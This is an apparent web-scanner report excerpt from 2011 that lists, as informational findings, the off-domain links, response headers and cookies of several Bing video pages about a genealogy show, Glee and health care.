
The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.redacted/Image.aspx?uuid=374bde5b-6704-4192-a1f6-9146f8d2ebd2&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=53511df1-cab0-4899-b3ac-57fd23e16f42&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=9bc269b0-2581-11df-a9a6-5a3963a74c6d&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=a4423ac0-090e-40c9-8a6a-3ec31bb067a7&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=c54b46a6-0935-40a0-b5bc-d168ded2e84c&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.redacted/Image.aspx?uuid=1f9e42d4-9168-44cd-be7a-a673ec791b6a&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=4199fb4f-0aa2-47ec-88dc-e308ea0b56d2&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=d7cbcfd2-5c80-43aa-92b3-da80c740b8d9&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=28b30d21-82db-4788-9b33-1a1558ad6b5b&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=7a2f818c-56ef-4d3b-a7f5-cc654d6c17ed&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2femotional-and-surprising-journeys%2f17wgxnwyo%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.hulu.com/watch?content_id=50117330
http://www.hulu.com/who-do-you-think-you-are
http://www.redacted/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 105273
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:15:33 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:33 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42008; domain=.bing.com; path=/videos
Set-Cookie: ocid=42008; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=2A046439AE0C4BEAB039A3EF561EA0B8; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cf0337bd634414bfa98e57cfaca8fdb9c; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2femotional-and-surprising-journeys%2f17wgxnwyo%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/who-do-you-think-you-are" data-instName="InfoRelatedLinks">Hulu - Who Do You Think You Are?</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/watch?content_id=50117330" data-instName="InfoRelatedLinks">Hulu Watch Page - Emotional and Surprising Journeys</a>
...[SNIP]...
s="motionThumb playerUrl"
title="Eight of our most favorite celebrities travel the globe to unlock the mysteries of their heritage." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=c54b46a6-0935-40a0-b5bc-d168ded2e84c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
%20are&rel=MSN" class="motionThumb playerUrl"
title="The amazing journies of celebrities' pasts is back for season two on February 4th." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=28b30d21-82db-4788-9b33-1a1558ad6b5b&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
Url"
title="Discover the singing star's connection to George Washington on this season of Who Do You Think You Are?" >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=d7cbcfd2-5c80-43aa-92b3-da80c740b8d9&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
q=who%20do%20you%20think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="Vanessa makes a fascinating discovery about her great great grandfather." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=4199fb4f-0aa2-47ec-88dc-e308ea0b56d2&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
0think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="Eight of today's hottest celebrities learn how history has shaped their lives." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=53511df1-cab0-4899-b3ac-57fd23e16f42&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
humb playerUrl"
title="Vanessa's journey into her family's past being with a visit to her father's final resting place." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=7a2f818c-56ef-4d3b-a7f5-cc654d6c17ed&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
km4?q=who%20do%20you%20think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="A look at singing star Tim McGraw's incredible upcoming journey." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=a4423ac0-090e-40c9-8a6a-3ec31bb067a7&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
" class="motionThumb playerUrl"
title="Vanessa Williams makes more than one rare discovery at the National Archives in Washington, D.C." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=1f9e42d4-9168-44cd-be7a-a673ec791b6a&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
lass="motionThumb playerUrl"
title="Get to know Vanessa as she's about to embark on the journey of not just one lifetime..." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=374bde5b-6704-4192-a1f6-9146f8d2ebd2&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
x celebrities on a journey to discover their roots in the NBC reality series, "Who Do You Think You Are?"" >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=9bc269b0-2581-11df-a9a6-5a3963a74c6d&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

22.404. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL&GT1=42007

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.redacted/Image.aspx?uuid=2ad67e67-47ed-49d5-bcb7-5a3dd74e74d6&w=400&h=300&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://tv.redacted/
http://tv.redacted/tv/series.aspx?series=ddba98ad-bf4b-4293-bf0f-e4f053bf735d
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fglee-season-2-volume-1-dvd-extra-rocky-horror%2f5svqwfs%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.redacted/

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 76329
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.437 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:01:04 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42007; domain=.bing.com; path=/videos
Set-Cookie: ocid=42007; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=71398422999D4434A086293033409942; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:03 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c90f8b31c25db49fb9066aaa59d9cc4f4; expires=Tue, 29-Jan-2013 17:01:03 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:04 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs" /><link rel="image_src" href="http://img1.catalog.video.redacted/Image.aspx?uuid=2ad67e67-47ed-49d5-bcb7-5a3dd74e74d6&w=400&h=300&so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fglee-season-2-volume-1-dvd-extra-rocky-horror%2f5svqwfs%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://tv.redacted/tv/series.aspx?series=ddba98ad-bf4b-4293-bf0f-e4f053bf735d" data-instName="InfoRelatedLinks">Learn more about 'Glee'</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://tv.redacted/" data-instName="InfoRelatedLinks">MSN TV</a>
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

22.405. http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o?q=health+care&rel=msn&from=en-us_msnhp&form=msnrll&gt1=31036

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.redacted/Image.aspx?uuid=086e62e8-bf4c-4491-a61f-fb322fe0fb30&w=400&h=300&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=1c6e5217-2840-76fd-9659-1351ce5074a9&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=9ed95b9b-89f0-49ab-aa9c-71252bc7eee2&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=a8c1a498-6626-473c-bd64-00a13b34440e&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=e825d2c4-c863-464f-b0d4-96a0a2b6da24&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.redacted/Image.aspx?uuid=1c995d94-3821-4162-9bbc-4329f6909bb5&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=222c5547-6db0-49a0-a214-c5657b911593&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=608cb71f-dc78-4abf-8dd8-c30b68871b8f&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=f589e128-359f-43b7-8a73-1c9bf7292ee1&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=daf88b9e-6bc8-4995-919c-0eca80215ca7&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=e6d56a2d-a19d-41a0-b17e-45384969dc27&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fhealthy-body-healthy-wallet%2f1d3rfv95o%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.redacted/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 110111
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:15:32 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.062 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:32 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=31036; domain=.bing.com; path=/videos
Set-Cookie: ocid=31036; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=B5B3B7F99F7E42BBBB4D99A3E9BD0689; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:31 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2caf34df9069e94b079e21d3eb6a21ddf2; expires=Tue, 29-Jan-2013 17:00:31 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o" /><link rel="image_src" href="http://img1.catalog.video.redacted/Image.aspx?uuid=086e62e8-bf4c-4491-a61f-fb322fe0fb30&w=400&h=300&so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fhealthy-body-healthy-wallet%2f1d3rfv95o%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
uss how health care reform will affect the health care sector and what stocks in the group are poised to benefit." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=608cb71f-dc78-4abf-8dd8-c30b68871b8f&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
bill, yet they refuse to give up their own government-sponsored health care. Rep. Steve Israel talks about the hypocrisy." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=f589e128-359f-43b7-8a73-1c9bf7292ee1&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
32;the responsibility of the community to deal with mental health issues because the consequences could affect any of us." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=e825d2c4-c863-464f-b0d4-96a0a2b6da24&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
talks about the irony of the situation because Harris’ platform opposed a public option to buy federal health care." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=a8c1a498-6626-473c-bd64-00a13b34440e&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;s remarks on the U.S. health-care system during last night's State of the Union address. 
     Shalal..." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=daf88b9e-6bc8-4995-919c-0eca80215ca7&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
d a future doctor are deeply divided over the public option and universal health care. NBC’s Chris Jansing reports." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=222c5547-6db0-49a0-a214-c5657b911593&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ple with decent health insurance? Consumer Reports questions the Secretary of Health & Human Services, Kathleen Sebelius." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=e6d56a2d-a19d-41a0-b17e-45384969dc27&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
hpa?q=health%20care&rel=MSN" class="motionThumb playerUrl"
title="Eight good things coming from the recently passed health care reform legislation." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=9ed95b9b-89f0-49ab-aa9c-71252bc7eee2&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
nsurance-dollar-100-a-month/3xoea4h7?q=health%20care&rel=MSN" class="motionThumb playerUrl"
title="A new solution to health care eliminates insurance entirely." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=1c6e5217-2840-76fd-9659-1351ce5074a9&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 Roth, of Action Against Obesity, and Jeff Stier, of the American Council on Science & Health, share their views." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=1c995d94-3821-4162-9bbc-4329f6909bb5&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

